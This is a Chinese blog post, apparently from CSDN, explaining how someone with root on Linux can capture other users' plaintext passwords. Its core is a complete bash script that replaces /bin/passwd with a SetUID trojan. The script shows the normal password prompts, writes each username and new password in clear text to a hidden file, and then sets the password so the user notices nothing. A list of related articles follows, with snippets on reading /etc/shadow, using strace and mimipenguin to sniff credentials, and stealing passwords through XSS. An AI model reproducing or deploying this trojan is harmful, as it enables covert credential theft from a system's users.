如何得到linux明文密码?

最新推荐文章于 2025-06-25 17:12:36 发布
最新推荐文章于 2025-06-25 17:12:36 发布
阅读量2.4w 收藏 8
点赞数 5
CC 4.0 BY-SA版权
分类专栏: shell脚本 linux 文章标签: 得到linux明文密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38228830/article/details/81428556
本文介绍了一种在获得Linux系统root权限后窃取用户密码的方法。通过替换系统的passwd命令为自定义的shell脚本,可以在用户修改密码时捕获其明文密码并保存。此方法利用了非交互式设置密码的功能。

在得到linux系统权限后可以为所欲为,只要你足够秀,但是你想得到其他用户的密码理论上是不可能的,linux密码加密都是单向加密,比如MD5、SHA256 、SHA512等,是不可逆的,不能通过密文得到名文,方法还是有的:

  • 思路:(前提你是root权限)
          先将passwd的原文件移到只有你知道的地方,然后你写个shell脚本和passwd同名,将它移动到  /bin 目录下(一般路径都是/bin/passwd 可以用which passwd  看一下),这样用户输入passwd修改密码时调用的是你的shell脚本,你就可以在设置之前对明文密码进行保存。

#!/bin/bash
echo  "更改用户 $1 的密码 。" 

read -s -p "新的 密码:" pawd1
echo ""
read -s -p "重新输入新的 密码:" pawd2

if [[ $pawd1==$pawd2 ]];then
        echo ""
        echo "$1  $pawd2" > /test/passwd    #将账号密码明文保存,方便自己查看
        echo "$pawd1" | passwd --stdin $1   #重点:非交互式设置用户密码
        echo "密码设置成功。"
else
        echo "抱歉。 密码不匹配。"
fi

  这样测试:

       /test/passwd zhang3   #设置zhang3用户密码,写你的脚本名,我只是举例!

 

注意:

     1、主要用到的是echo "passwd" | passwd --stdin user  这条命令,如果你移动了原passwd文件 代码中请写原passwd文件绝对路径。比如   echo "$pawd1" | /test/passwd --stdin $1 。

     2、自定义的passwd脚本,需要加SetUID权限,改密码都要以root权限运行的,无论是哪个用户。命令:chmod  u+s passwd 

 

操作系统权限提升(二十四)之Linux提权-明文ROOT密码提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-01 799
大多数linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件息息相关。passwd里面储存了用户,shadow里面是密码的hash。shadow是仅root可读写的,当管理员的passwd和shadow一些权限配置不当就可能会导致提权。然后在电脑上新建一个shadow.txt的文件,将复制的内容放进去。主要是查看当前的shadow文件是否可以读取,主要有以下几种方式。我们拿下了目标机器,发现目标机器上的shadow居然有读写权限。我们发现对方的shadow文件可以查看。
linux用户密码转换明文,Linux strace 明文密码抓取
weixin_39637711的博客
04-28 1548
strace常用来跟踪进程执行时的系统调用和所接收的信号,默认是没有安装,但是往往在提权后我们想得到root密码,我们可以使用这种方法来获取明文密码.安装很简单就一条命令 (Test On centos 6.5)yum install strace -y接下来要做先看一下sshd的pid:ps -ef | grep sshd[root@WebSrv ~]# ps -ef | grep sshdro...
获取本机所有明文密码
08-15
本工具可以轻松获取,系统密码,包括浏览器存储的密码,以及各种邮箱,等系统所有密码
查看linux用户密码
热门推荐
飞乐鸟的博客
10-17 9万+
需要root用户 用户名在/etc/passwd这个文件中; 密码在/etc/shadow中 cat /etc/passwd cat /etc/shadow root:$6$1WtyW6O0baQmTkDG$o.YXXTOZSb7hP4HitigzaW/mZS433aSFpancmyNKYxU/59FuPVlIeVNBUKQQVgzx3kszkQAxo6C2wjrRbv0VZ.::0:99999:7::: 格式解释 {用户名}:{加密密码}:{口令最后修改时间距原点..
Linux 修改密码教程
最新发布
weixin_45724648的博客
06-25 1924
本文介绍了 Linux 系统中修改密码的方法,包括修改当前用户密码、其他用户密码以及重置密码的操作步骤。通过 passwd 命令可以轻松完成密码修改,管理员还可以使用 sudo 权限修改其他用户密码。文章还提供了密码强度检查和常见问题的解决方案,帮助用户快速掌握 Linux 密码管理。
通过命令查看linux 密码,linux查看用户密码(linux查看用户密码命令)
weixin_36028342的博客
04-28 6万+
linux查看用户密码(linux查看用户密码命令)2020-05-15 13:18:30共10个回答1、用户名和密码的存储位置存储帐号的文件:/etc/passwd存储密码的文件:/etc/shadow2、可以使用cat、more、head、tail以及vim等命令查看或者修改,如下图所示:比如要查找系统中admin普通用户的密码,则执行:cat/etc/shadow|grep"admin"3、...
linux明文密码,登录页面密码支持明文查看
weixin_32467423的博客
05-05 2135
好多APP登录页面为了查看自己输入密码是否正确都添加了明文查看的方法,也就是所谓的小眼睛,把小眼睛的代码分享给大家.Activity://声明id:private EditText etUserName;private ImageView iv_eye;//查找idetPassword = findViewById(R.id.et_password);iv_eye = findViewById(R...
linux获取明文密码,linux下抓取内存中明文密码mimipenguin
weixin_30200061的博客
04-29 448
基本使用语法:root@kali:~/eth10/eth10#wgethttps://codeload.github.com/huntergregal/mimipenguin/zip/master--2017-08-1908:25:09--https://codeload.github.com/huntergregal/mimipenguin/zip/master……root@kali:...
Windows登录的明文密码如何存储?使用hashdump抓取的密文包含哪些部分?
m0_71474212的博客
05-28 894
它是一种质询/应答身份验证协议,用于在网络环境中验证用户的身份。NTLM协议既可以为工作组中的机器提供身份验证,也可以用于域环境身份验证。在NTLM认证的过程中,客户端回和服务器进行一系列的交互,以便于验证用户的身份;
MySQL在Linux系统中隐藏命令行中的密码的方法
09-10
Linux系统中,由于命令行的可见性,直接在命令行中输入包含密码的命令会带来安全隐患。例如,当使用MySQL命令时,如果密码明文出现在命令行中,可以通过`ps`命令查看当前运行的进程,从而暴露密码。为了防止这种...
nacos登陆表单明文密码加密
搬砖工
01-26 1696
nacos登陆表单明文密码加密指登陆密码在Java客户端配置加密后的密码。 在使用 Nacos 作为服务注册与配置中心时,为了提高安全性,通常不建议在客户端或配置文件中以明文形式存储密码。Nacos 支持密码的加密存储,主要通过以下几种方式实现:1. 使用 Nacos 提供的内置加密/解密工具;2. 在配置文件中使用加密后的密码;3. 解密和验证
linux下读密码工具.rar
07-20
这个工具受到了Windows系统中知名的mimikatz工具的启发,mimikatz是一款强大的安全审计软件,主要用于提取内存中的敏感信息,如明文密码、哈希值等。 在Linux中,密码通常以加密形式存储在`/etc/shadow`文件中,而...
sudo用户管理和破解linux Root 密码.pdf
03-13
文件给出了sudo的具体用法以及破解root密码的详细步骤
Linux下输入的密码明文现实,linux中mydumper需要输入明文密码解决方案
weixin_29579377的博客
04-30 336
在使用mydumper时,需要再命令行中输入用户名和密码,这会记录到history中,这样的话,就是相对不安全。[root@liufofu backup]# mydumper -h localhost -u root -p tiger -c -o ./liufofu/ -B liufofu查了下官方提供的解决方案有2种:1、在homedir中新建一个.my.cfg,输入你的用户和密码2、打上相应的...
Linux可以明文传输密码的工具sshpass
angou6476的博客
02-09 223
普通ssh只能手动输入密码,但是sshpass可以明文指定密码,但不建议使用,太不安全了。 转载于:https://www.cnblogs.com/EasonJim/p/8434342.html
linux用户密码转换明文,Linux运维知识之linux下抓取内存中明文密码mimipenguin
weixin_29615645的博客
04-28 636
本文主要向大家介绍了Linux运维知识之linux下抓取内存中明文密码mimipenguin,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。下载地址:https://github.com/huntergregal/mimipenguin基本使用语法:root@kali:~/eth10/eth10#wgethttps://codeload.github.com/hunte...
linux获取明文密码,XSS获取用户明文密码
weixin_31951239的博客
04-29 645
浏览器特性导致,firefox与chrome是默认这样的。IE8默认不会。其他的不关心不测试。浏览器在用户登录时,会提示用户是否记住密码:1、对于firefox,用户有三个选择:记住、不记录本站、暂不。2、对于chorme,用户只有在输入正确密码登录成功后,才会出现提示:“想让谷歌浏览器保存您的密码吗?”,用户有两个选择:保存密码、此站一律不保存密码。3、而当在“自动完成”设置里开启IE8的“表单...
linux明文密码,win10系统查看明文密码的操作方法
weixin_39636079的博客
05-05 317
很多小伙伴都遇到过对win10系统查看明文密码的设置方法,想必大家都遇到过需要对win10系统查看明文密码进行设置的情况吧,那么应该怎么设置win10系统查看明文密码的操作方法非常简单,只需要1、因为在Win10系统中,凡是需要输入密码的对话框,在你输入密码的时候,都会在密码框的右侧显示一只眼睛图标。如图: 2、你用鼠标去点击这只眼睛,会看到什么变化?如图:这样的步骤就可以了;下面小编带领大家看看...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值